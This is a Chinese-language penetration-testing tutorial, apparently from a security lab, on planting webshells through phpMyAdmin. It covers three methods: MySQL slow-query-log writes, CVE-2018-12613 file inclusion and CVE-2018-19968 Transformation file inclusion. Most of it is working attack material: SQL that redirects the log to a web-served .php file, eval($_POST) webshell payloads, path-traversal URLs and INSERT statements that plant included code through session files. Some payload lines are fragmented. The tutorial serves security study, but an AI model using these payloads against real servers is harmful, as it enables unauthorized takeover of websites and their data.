在上期我们讲了
本期会为大家带来
通过慢查询日志、CVE-2018-12613 、
CVE-2018-19968 phpmyadmin文件
包含写入webshell
四. 使用慢日志查询getshell
慢查询日志:记录所有执行时间超过long_query_time秒的所有查询或者不使用索引的查询。默认情况下,MySQL数据 库是不开启慢查询日志的,long_query_time的默认值为10(即10秒,通常设置为1秒),即运行10秒以上 的语句是慢查询语句。
(一)利用条件
Root数据库用户(root权限)
网站绝对路径(确定有写入权限)
secure_file_priv没有具体值
(二)操作步骤:
1、 查看慢查询日志的配置:
show variables like '%slow%';

set GLOBAL slow_query_log=on;
set global slow_query_log_file = 'E:/phpstudy_pro/WWW/1.php';

select 'eval($_POST["admin"]); ' or sleep(11); @
五. CVE-2018-12613 phpmyadmin文件包含getshell
影响版本:Phpmyadmin 4.8.0/4.8.0.1/4.8.1
http://127.0.0.1/phpMyAdmin-4.8.1/index.php?target=db_sql.php%253f/../../../../../../phpstudy_pro/WWW/1.txt



/index.php?target=db_sql.php%253f/../../../../../../phpStudy/PHPTutorial/MySQL/data/test/test1.frm
"a.php","w"),'<?php eval($_POST[a]);?>'); fputs(fopen(





SELECT `"a.php","w"),'<?php eval($_POST[a]);?>'); `; #注意为反引号 fputs(fopen(

index.php?target=db_sql.php%253f/../../../../../../phpStudy/PHPTutorial/tmp/tmp/sess_a5gbrbj1rr01lpqpi6mkecc1ti1ar692


六. CVE-2018-19968 phpmyadmin文件包含getshell
环境搭建:在线环境VulnSpy已为大家提供在线phpMyAdmin环境地址:https : //www.vsplate.com/?github = vulnspy/phpmyadmin-4.8.1,单击又上角的START TO HACK按钮可进行在线测试。也可以选择自行到phpmyadmin官网下载对应版本。
利用条件:攻击者必须能够访问phpMyAdmin配置存储表,尽管可以在攻击者访问的任何数据库中轻松创建这些表。但攻击者必须拥有有效的凭据才能登录phpMyAdmin,所以此漏洞不允许攻击者绕过登录系统。
漏洞细节:2018年12月07日 phpMyAdmin 发布安全公告PMASA-2018-6修复了一个由Transformation特性引起的本地文件读取漏洞,影响4.8.0~4.8.3版本,CVE编号CVE-2018-19968。
Transformation是phpMyAdmin中的一个高级功能,通过Transformation可以对每个字段的内容使用不同的转换,每个字段中的内容将被预定义的规则所转换。比如我们有一个存有文件名的字段 ‘Filename’,正常情况下 phpMyAdmin 只会将路径显示出来。但是通过Transformation我们可以将该字段转换成超链接,我们就能直接在 phpMyAdmin 中点击并在浏览器的新窗口中看到这个文件。
通常情况下Transformation的规则存储在每个数据库的pmacolumn_info 表中,而在phpMyAdmin 4.0.0~4.8.3版本中,由于对转换参数处理不当,导致了任意文件包含漏洞的出现。在tbl_replace.php文件中拼接到$filename的变量filename的变量mime_map$column_name来自于数据表pmacolumn_info中的input_transformation字段,因为数据库中的内容用户可控,从而产生了任意文件包含漏洞。
利用步骤:
1、首先登陆进后台,这里默认是root,toor
2、漏洞利用思路
创建数据库,并将PHP代码写入SESSION文件中
CREATE DATABASE foo;
CREATE TABLE foo.bar ( baz VARCHAR(100) PRIMARY KEY );
INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>';
访问http://target/com/chk_rel.php?fixall_pmadb=1&db=foo在数据库foo中生成phpMyAdmin的配置表。
将篡改后的Transformation数据插入表pma_columninfo中将sess中的替换成你的会话ID,即COOKIE中phpMyAdmin的值,抓包查看session id,如下
INSERT INTO pma__column_info SELECT '1', 'foo', 'bar', 'baz', 'plop', 'plop', 'plop', 'plop', '../../../../../../../../tmp/sess_***','plop';
#将sess_中的替换成你的会话ID,即COOKIE中phpMyAdmin的值
然后访问
http://target.com/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1
就能自动包含刚才插入数据库表的恶意代码
sessionID文件常见路径:在Linux下,常见的文件路径为:/var/lib/php/session/或/tmp/ 在Windows下:默认为c:/windows/temp/ phpstudy集成软件环境下,文件路径为:/phpstudy/PHPTutorial/tmp/tmp/ Wamp集成软件环境下,文件路径为:/wamp64/tmp/ 因为环境搭建方式的不同,session文件的路径也会不同(通过修改php.ini中的session.save_path值可以改变session的保存路径),并且对于攻击者session文件的绝对路径也是不能直接获取到的,只能靠常见路径或猜路径去利用。
天虞实验室正式成立于2020年6月,是赛宁网安旗下以攻防技术研究为目标的安全团队,目前拥有20位专业的安全研究员,专注于渗透测试、安全开发、IOT安全、工控安全等方面。